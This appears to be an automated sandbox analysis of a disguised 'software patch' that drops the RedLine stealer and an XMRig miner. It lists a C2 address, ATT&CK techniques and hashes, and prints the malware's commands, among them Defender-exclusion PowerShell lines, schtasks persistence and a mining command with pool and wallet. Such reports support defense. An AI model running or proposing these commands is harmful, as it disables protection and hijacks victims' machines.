redline | f2f1cba015211deb613359de61bc4bed08c9ccf1af7b9af89d73aaa1f4da6d42

Analysis

max time kernel
153s
max time network
164s
platform
windows10_x64
resource
win10-en-20210920
submitted
28-10-2021 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Software patch by Silensix.exe
Size

3.0MB
MD5

1f1d67844ed54e1f03355f57ba8b17fc
SHA1

248262da44662b7347ff6de745ac498ca7984e88
SHA256

f2f1cba015211deb613359de61bc4bed08c9ccf1af7b9af89d73aaa1f4da6d42
SHA512

9714f8fbd1533b54f4fbff6da24ba322e6f49ac47bc1a83d336424fb31cbd0f6b0bff8139f4ca9a13706593fbe288f89a9f74103a364fd56e13869dc32bde73d

Score

10^/10

redline xmrig youtube discovery evasion infostealer miner spyware stealer themida trojan

Malware Config

Extracted

Family

redline

Botnet

Youtube

185.203.240.16:1249

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3720-140-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3720-141-0x0000000000418D32-mapping.dmp	family_redline

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/3916-537-0x000000014030F3F8-mapping.dmp	xmrig
behavioral2/memory/3916-549-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exe

pid process

3748 Datafile32.exe
432 Datafile64.exe
3024 Server32.exe
3720 Server32.exe
3592 services32.exe
1544 services64.exe
3464 sihost32.exe
3320 sihost64.exe

pid	process
3748	Datafile32.exe
432	Datafile64.exe
3024	Server32.exe
3720	Server32.exe
3592	services32.exe
1544	services64.exe
3464	sihost32.exe
3320	sihost64.exe

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

services64.exeSoftware patch by Silensix.exeDatafile64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	services64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Software patch by Silensix.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Software patch by Silensix.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	services64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 6 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/3584-118-0x0000000000EC0000-0x0000000000EC1000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe	themida
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe	themida
behavioral2/memory/432-131-0x0000000000400000-0x0000000000EAE000-memory.dmp	themida
C:\Windows\System32\services64.exe	themida
C:\Windows\system32\services64.exe	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Software patch by Silensix.exeDatafile64.exeservices64.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Software patch by Silensix.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Datafile64.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	services64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

Processes:

conhost.execonhost.exe

description	ioc	process
File created	C:\Windows\system32\services64.exe	conhost.exe
File opened for modification	C:\Windows\system32\services64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\sihost64.exe	conhost.exe
File created	C:\Windows\system32\Microsoft\Libs\WR64.sys	conhost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

Software patch by Silensix.exeDatafile64.exeservices64.exe

pid process

3584 Software patch by Silensix.exe
432 Datafile64.exe
1544 services64.exe

pid	process
3584	Software patch by Silensix.exe
432	Datafile64.exe
1544	services64.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

Server32.execonhost.exe

description	pid	process	target process
PID 3024 set thread context of 3720	3024	Server32.exe	Server32.exe
PID 2492 set thread context of 3916	2492	conhost.exe	nslookup.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

3776 schtasks.exe
1628 schtasks.exe

pid	process
3776	schtasks.exe
1628	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

conhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.exenslookup.exe

pid	process
2732	conhost.exe
3932	powershell.exe
3932	powershell.exe
3932	powershell.exe
3960	powershell.exe
3960	powershell.exe
3960	powershell.exe
3720	Server32.exe
1340	conhost.exe
508	powershell.exe
508	powershell.exe
508	powershell.exe
1016	powershell.exe
1016	powershell.exe
1016	powershell.exe
3672	conhost.exe
3672	conhost.exe
1456	powershell.exe
1456	powershell.exe
1456	powershell.exe
3104	powershell.exe
3104	powershell.exe
3104	powershell.exe
2492	conhost.exe
2492	conhost.exe
1720	powershell.exe
1720	powershell.exe
1720	powershell.exe
608	powershell.exe
608	powershell.exe
608	powershell.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe
3916	nslookup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Software patch by Silensix.execonhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3584	Software patch by Silensix.exe
Token: SeDebugPrivilege	2732	conhost.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeIncreaseQuotaPrivilege	3932	powershell.exe
Token: SeSecurityPrivilege	3932	powershell.exe
Token: SeTakeOwnershipPrivilege	3932	powershell.exe
Token: SeLoadDriverPrivilege	3932	powershell.exe
Token: SeSystemProfilePrivilege	3932	powershell.exe
Token: SeSystemtimePrivilege	3932	powershell.exe
Token: SeProfSingleProcessPrivilege	3932	powershell.exe
Token: SeIncBasePriorityPrivilege	3932	powershell.exe
Token: SeCreatePagefilePrivilege	3932	powershell.exe
Token: SeBackupPrivilege	3932	powershell.exe
Token: SeRestorePrivilege	3932	powershell.exe
Token: SeShutdownPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeSystemEnvironmentPrivilege	3932	powershell.exe
Token: SeRemoteShutdownPrivilege	3932	powershell.exe
Token: SeUndockPrivilege	3932	powershell.exe
Token: SeManageVolumePrivilege	3932	powershell.exe
Token: 33	3932	powershell.exe
Token: 34	3932	powershell.exe
Token: 35	3932	powershell.exe
Token: 36	3932	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	3720	Server32.exe
Token: SeIncreaseQuotaPrivilege	3960	powershell.exe
Token: SeSecurityPrivilege	3960	powershell.exe
Token: SeTakeOwnershipPrivilege	3960	powershell.exe
Token: SeLoadDriverPrivilege	3960	powershell.exe
Token: SeSystemProfilePrivilege	3960	powershell.exe
Token: SeSystemtimePrivilege	3960	powershell.exe
Token: SeProfSingleProcessPrivilege	3960	powershell.exe
Token: SeIncBasePriorityPrivilege	3960	powershell.exe
Token: SeCreatePagefilePrivilege	3960	powershell.exe
Token: SeBackupPrivilege	3960	powershell.exe
Token: SeRestorePrivilege	3960	powershell.exe
Token: SeShutdownPrivilege	3960	powershell.exe
Token: SeDebugPrivilege	3960	powershell.exe
Token: SeSystemEnvironmentPrivilege	3960	powershell.exe
Token: SeRemoteShutdownPrivilege	3960	powershell.exe
Token: SeUndockPrivilege	3960	powershell.exe
Token: SeManageVolumePrivilege	3960	powershell.exe
Token: 33	3960	powershell.exe
Token: 34	3960	powershell.exe
Token: 35	3960	powershell.exe
Token: 36	3960	powershell.exe
Token: SeDebugPrivilege	1340	conhost.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeIncreaseQuotaPrivilege	508	powershell.exe
Token: SeSecurityPrivilege	508	powershell.exe
Token: SeTakeOwnershipPrivilege	508	powershell.exe
Token: SeLoadDriverPrivilege	508	powershell.exe
Token: SeSystemProfilePrivilege	508	powershell.exe
Token: SeSystemtimePrivilege	508	powershell.exe
Token: SeProfSingleProcessPrivilege	508	powershell.exe
Token: SeIncBasePriorityPrivilege	508	powershell.exe
Token: SeCreatePagefilePrivilege	508	powershell.exe
Token: SeBackupPrivilege	508	powershell.exe
Token: SeRestorePrivilege	508	powershell.exe
Token: SeShutdownPrivilege	508	powershell.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeSystemEnvironmentPrivilege	508	powershell.exe
Token: SeRemoteShutdownPrivilege	508	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Software patch by Silensix.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exesihost32.exeservices64.exe

description	pid	process	target process
PID 3584 wrote to memory of 3748	3584	Software patch by Silensix.exe	Datafile32.exe
PID 3584 wrote to memory of 3748	3584	Software patch by Silensix.exe	Datafile32.exe
PID 3584 wrote to memory of 432	3584	Software patch by Silensix.exe	Datafile64.exe
PID 3584 wrote to memory of 432	3584	Software patch by Silensix.exe	Datafile64.exe
PID 3584 wrote to memory of 3024	3584	Software patch by Silensix.exe	Server32.exe
PID 3584 wrote to memory of 3024	3584	Software patch by Silensix.exe	Server32.exe
PID 3584 wrote to memory of 3024	3584	Software patch by Silensix.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3024 wrote to memory of 3720	3024	Server32.exe	Server32.exe
PID 3748 wrote to memory of 2732	3748	Datafile32.exe	conhost.exe
PID 3748 wrote to memory of 2732	3748	Datafile32.exe	conhost.exe
PID 3748 wrote to memory of 2732	3748	Datafile32.exe	conhost.exe
PID 2732 wrote to memory of 1780	2732	conhost.exe	cmd.exe
PID 2732 wrote to memory of 1780	2732	conhost.exe	cmd.exe
PID 1780 wrote to memory of 3932	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 3932	1780	cmd.exe	powershell.exe
PID 2732 wrote to memory of 2112	2732	conhost.exe	cmd.exe
PID 2732 wrote to memory of 2112	2732	conhost.exe	cmd.exe
PID 2112 wrote to memory of 3776	2112	cmd.exe	schtasks.exe
PID 2112 wrote to memory of 3776	2112	cmd.exe	schtasks.exe
PID 1780 wrote to memory of 3960	1780	cmd.exe	powershell.exe
PID 1780 wrote to memory of 3960	1780	cmd.exe	powershell.exe
PID 432 wrote to memory of 1340	432	Datafile64.exe	conhost.exe
PID 432 wrote to memory of 1340	432	Datafile64.exe	conhost.exe
PID 432 wrote to memory of 1340	432	Datafile64.exe	conhost.exe
PID 1340 wrote to memory of 2776	1340	conhost.exe	cmd.exe
PID 1340 wrote to memory of 2776	1340	conhost.exe	cmd.exe
PID 2776 wrote to memory of 508	2776	cmd.exe	powershell.exe
PID 2776 wrote to memory of 508	2776	cmd.exe	powershell.exe
PID 1340 wrote to memory of 3012	1340	conhost.exe	cmd.exe
PID 1340 wrote to memory of 3012	1340	conhost.exe	cmd.exe
PID 3012 wrote to memory of 1628	3012	cmd.exe	schtasks.exe
PID 3012 wrote to memory of 1628	3012	cmd.exe	schtasks.exe
PID 2732 wrote to memory of 3692	2732	conhost.exe	cmd.exe
PID 2732 wrote to memory of 3692	2732	conhost.exe	cmd.exe
PID 3692 wrote to memory of 3592	3692	cmd.exe	services32.exe
PID 3692 wrote to memory of 3592	3692	cmd.exe	services32.exe
PID 2776 wrote to memory of 1016	2776	cmd.exe	powershell.exe
PID 2776 wrote to memory of 1016	2776	cmd.exe	powershell.exe
PID 1340 wrote to memory of 3720	1340	conhost.exe	cmd.exe
PID 1340 wrote to memory of 3720	1340	conhost.exe	cmd.exe
PID 3720 wrote to memory of 1544	3720	cmd.exe	services64.exe
PID 3720 wrote to memory of 1544	3720	cmd.exe	services64.exe
PID 3592 wrote to memory of 3672	3592	services32.exe	conhost.exe
PID 3592 wrote to memory of 3672	3592	services32.exe	conhost.exe
PID 3592 wrote to memory of 3672	3592	services32.exe	conhost.exe
PID 3672 wrote to memory of 1700	3672	conhost.exe	cmd.exe
PID 3672 wrote to memory of 1700	3672	conhost.exe	cmd.exe
PID 1700 wrote to memory of 1456	1700	cmd.exe	powershell.exe
PID 1700 wrote to memory of 1456	1700	cmd.exe	powershell.exe
PID 3672 wrote to memory of 3464	3672	conhost.exe	sihost32.exe
PID 3672 wrote to memory of 3464	3672	conhost.exe	sihost32.exe
PID 1700 wrote to memory of 3104	1700	cmd.exe	powershell.exe
PID 1700 wrote to memory of 3104	1700	cmd.exe	powershell.exe
PID 3464 wrote to memory of 2812	3464	sihost32.exe	conhost.exe
PID 3464 wrote to memory of 2812	3464	sihost32.exe	conhost.exe
PID 3464 wrote to memory of 2812	3464	sihost32.exe	conhost.exe
PID 1544 wrote to memory of 2492	1544	services64.exe	conhost.exe

C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe
"C:\Users\Admin\AppData\Local\Temp\Software patch by Silensix.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3584

C:\Users\Admin\AppData\Local\Temp\Datafile32.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3748

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"
5⤵
- Creates scheduled task(s)
PID:3776

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\services32.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3692

C:\Users\Admin\services32.exe
C:\Users\Admin\services32.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3464

C:\Windows\System32\conhost.exe
"C:\Windows\System32\\conhost.exe" "/sihost32"
8⤵
PID:2812

C:\Users\Admin\AppData\Local\Temp\Datafile64.exe
"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1340

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1016

C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
5⤵
- Creates scheduled task(s)
PID:1628

C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\system32\services64.exe
C:\Windows\system32\services64.exe
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1544

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2492

C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
7⤵
PID:1756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
8⤵
- Suspicious behavior: EnumeratesProcesses
PID:608

C:\Windows\system32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
7⤵
- Executes dropped EXE
PID:3320

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
8⤵
PID:684

C:\Windows\System32\nslookup.exe
C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
7⤵
- Suspicious behavior: EnumeratesProcesses
PID:3916

C:\Users\Admin\AppData\Local\Temp\Server32.exe
"C:\Users\Admin\AppData\Local\Temp\Server32.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3024

C:\Users\Admin\AppData\Local\Temp\Server32.exe
C:\Users\Admin\AppData\Local\Temp\Server32.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
MD5
84f2160705ac9a032c002f966498ef74

SHA1
e9f3db2e1ad24a4f7e5c203af03bbc07235e704c

SHA256
7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93

SHA512
f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.log
MD5
41fbed686f5700fc29aaccf83e8ba7fd

SHA1
5271bc29538f11e42a3b600c8dc727186e912456

SHA256
df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

SHA512
234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
91e6681b0d95b11a838130edb5f35b24

SHA1
2ffb3d6f985b26691ca7a607429d7364d63d1f9c

SHA256
52a50b063681d372d9dce2d5791fa686f6b686fb2f3d313c267a24ea322054b2

SHA512
f819c2196b5a78a98f857d4d13d39c3f36c5690c51162d03fd771b1bf42d96b305ddec2ea6d3e69ce0dbf0c8027018e57e99f8eb7730924aa2e07c62cb19c5cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
5565930ffc45d8bf06e27d891141efe3

SHA1
4eb34e7ea219a5a00cc2aeec884c6ddef5176c69

SHA256
ca05e17ed2819c89aef66ba0a44b07e2fcbf370dbdc708ccaea939c950a0e170

SHA512
1e72f4d6ac0917a15e8cecf6513711e05fb2f1d86482e3008be3994ddf3a98295c2bc724993639b80880fa3bb1ba6652727d16fbac13d8d1968136b177ad721b

Download Submit
